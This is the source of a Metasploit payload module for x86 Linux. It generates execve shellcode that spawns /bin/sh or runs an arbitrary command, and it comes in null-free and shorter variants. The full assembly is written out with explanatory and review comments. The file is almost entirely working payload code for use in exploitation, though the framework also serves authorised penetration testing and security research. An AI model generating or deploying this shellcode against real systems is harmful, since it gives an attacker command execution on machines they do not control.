##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# Exec
# ----
#
# Executes an arbitrary command.
#
###
module MetasploitModule

  # Byte size recorded for the payload built with the default options
  # (presumably consumed by the framework's size cache; not verified here).
  CachedSize = 43

  include Msf::Payload::Single
  include Msf::Payload::Linux

  # Registers module metadata and its two options:
  #   CMD             (optional) the command string to run; when empty the
  #                   payload just spawns /bin/sh.
  #   NullFreeVersion (advanced, default false) selects the shellcode
  #                   variant written to avoid 0x00 bytes.
  #
  # @param info [Hash] module metadata merged via merge_info
  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Execute Command',
      'Description'   => 'Execute an arbitrary command or just a /bin/sh shell',
      'Author'        => ['vlad902',
                          'Geyslan G. Bem <geyslan[at]gmail.com>'],
      'License'       => MSF_LICENSE,
      'References'    => [ ['URL', 'https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm'],
                           ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm'] ],
      'Platform'      => 'linux',
      'Arch'          => ARCH_X86
    ))

    # Register exec options
    register_options(
      [
        OptString.new('CMD', [ false, "The command string to execute" ]),
      ])
    register_advanced_options(
      [
        OptBool.new('NullFreeVersion', [ true, "Null-free shellcode version", false ])
      ])
  end

  # Assembles the x86 Linux shellcode for the current datastore.
  #
  # With CMD empty the stub performs execve("/bin/sh", NULL, NULL); otherwise
  # it performs execve("/bin/sh", ["/bin/sh", "-c", CMD], NULL) with CMD
  # embedded after the code and located at run time via call/pop (jmp/call/pop
  # in the null-free variant). NullFreeVersion picks the variant whose
  # encoding avoids 0x00 bytes, at the cost of a few extra bytes.
  #
  # @param opts [Hash] not used by this method; kept for the Msf::Payload
  #   interface
  # @return [String] the raw machine-code bytes produced by Metasm
  # @raise [RangeError] null-free variant only, when CMD is longer than 0xffff
  #   (the length is loaded into the 16-bit bx register)
  def generate(opts={})
    cmd = datastore['CMD'] || ''
    nullfreeversion = datastore['NullFreeVersion']
    if cmd.empty?
      #
      # Builds the exec payload which executes a /bin/sh shell.
      # execve("/bin/sh", NULL, NULL)
      #
      if nullfreeversion
        # 21 bytes (null-free)
        # "/bin//sh" is used instead of "/bin/sh" so both pushed dwords are
        # free of 0x00; the NUL terminator comes from the zeroed ecx push.
        payload = <<-EOS
          xor ecx, ecx         ; ecx = NULL
          mul ecx              ; eax and edx = NULL
          mov al, 0xb          ; execve syscall
          push ecx             ; string '\0'
          push 0x68732f2f      ; "//sh"
          push 0x6e69622f      ; "/bin"
          mov ebx, esp         ; pointer to "/bin//sh\0" cmd
          int 0x80             ; bingo
        EOS
      else
        # 20 bytes (not null-free)
        # The terminator is embedded in the first push (0x0068732f), which is
        # what makes this variant one byte shorter but not null-free.
        payload = <<-EOS
          xor ecx, ecx         ; ecx = NULL
          mul ecx              ; eax and edx = NULL
          mov al, 0xb          ; execve syscall
          push 0x0068732f      ; "/sh\0"
          push 0x6e69622f      ; "/bin"
          mov ebx, esp         ; pointer to "/bin/sh\0" cmd
          int 0x80             ; bingo
        EOS
      end
    else
      #
      # Dynamically builds the exec payload based on the user's options.
      # execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)
      #
      # NOTE(review): CMD is interpolated verbatim into the assembler source
      # (the db directives below); a CMD containing a double quote presumably
      # fails to assemble rather than being escaped — confirm against Metasm's
      # string syntax.
      pushw_c_opt = "dd 0x632d6866" # pushw 0x632d (metasm doesn't support pushw)
      if nullfreeversion
        # The command length becomes an immediate in "mov bx, N", so it must
        # fit in 16 bits.
        if cmd.length > 0xffff
          raise RangeError, "CMD length has to be smaller than %d" % 0xffff, caller()
        end
        # Use the 8-bit register when the length fits in one byte (shorter
        # encoding and no chance of a zero high byte).
        if cmd.length <= 0xff # 255
          breg = "bl"
        else
          breg = "bx"
          # A length whose low byte is zero would place a 0x00 in the
          # 16-bit immediate; padding the command by one space avoids it.
          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
            cmd += " "
          end
        end
        # NOTE(review): cmd.length counts characters while db emits bytes, so
        # the NUL written at [esi+ebx] below may land short of the end for a
        # non-ASCII CMD — confirm whether datastore strings are always ASCII.
        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"
        # 47/49 bytes without cmd (null-free)
        # jmp/call/pop leaves the address of the embedded command in esi; the
        # terminator is written at run time (dl is zero after mul) so no 0x00
        # byte has to appear in the shellcode itself.
        payload = <<-EOS
          xor ebx, ebx
          mul ebx
          mov al, 0xb
          push edx
          #{pushw_c_opt}               ; "-c"
          mov edi, esp
          jmp tocall                   ; jmp/call/pop cmd address
        afterjmp:
          pop esi                      ; pop cmd address into esi
          #{mov_cmd_len_to_breg}       ; mov (byte/word) (bl/bx), cmd.length
          mov [esi+ebx], dl            ; NUL '\0' terminate cmd
          push edx
          push 0x68732f2f              ; "//sh"
          push 0x6e69622f              ; "/bin"
          mov ebx, esp
          push edx
          push esi
          push edi
          push ebx
          mov ecx, esp
          int 0x80
        tocall:
          call afterjmp                ; call/pop cmd address
          db "#{cmd}"
        EOS
      else
        # 36 bytes without cmd (not null-free)
        # cdq sign-extends eax (0xb) into edx, leaving edx = 0 for the NULL
        # envp and argv terminator; the command is NUL-terminated inline via
        # the trailing 0x00 in the db directive.
        payload = <<-EOS
          push 0xb
          pop eax
          cdq
          push edx
          #{pushw_c_opt}               ; "-c"
          mov edi, esp
          push 0x0068732f              ; "/sh\0"
          push 0x6e69622f              ; "/bin"
          mov ebx, esp
          push edx
          call continue
          db "#{cmd}", 0x00
        continue:
          push edi
          push ebx
          mov ecx, esp
          int 0x80
        EOS
      end
    end
    Metasm::Shellcode.assemble(Metasm::Ia32.new, payload).encode_string
  end
end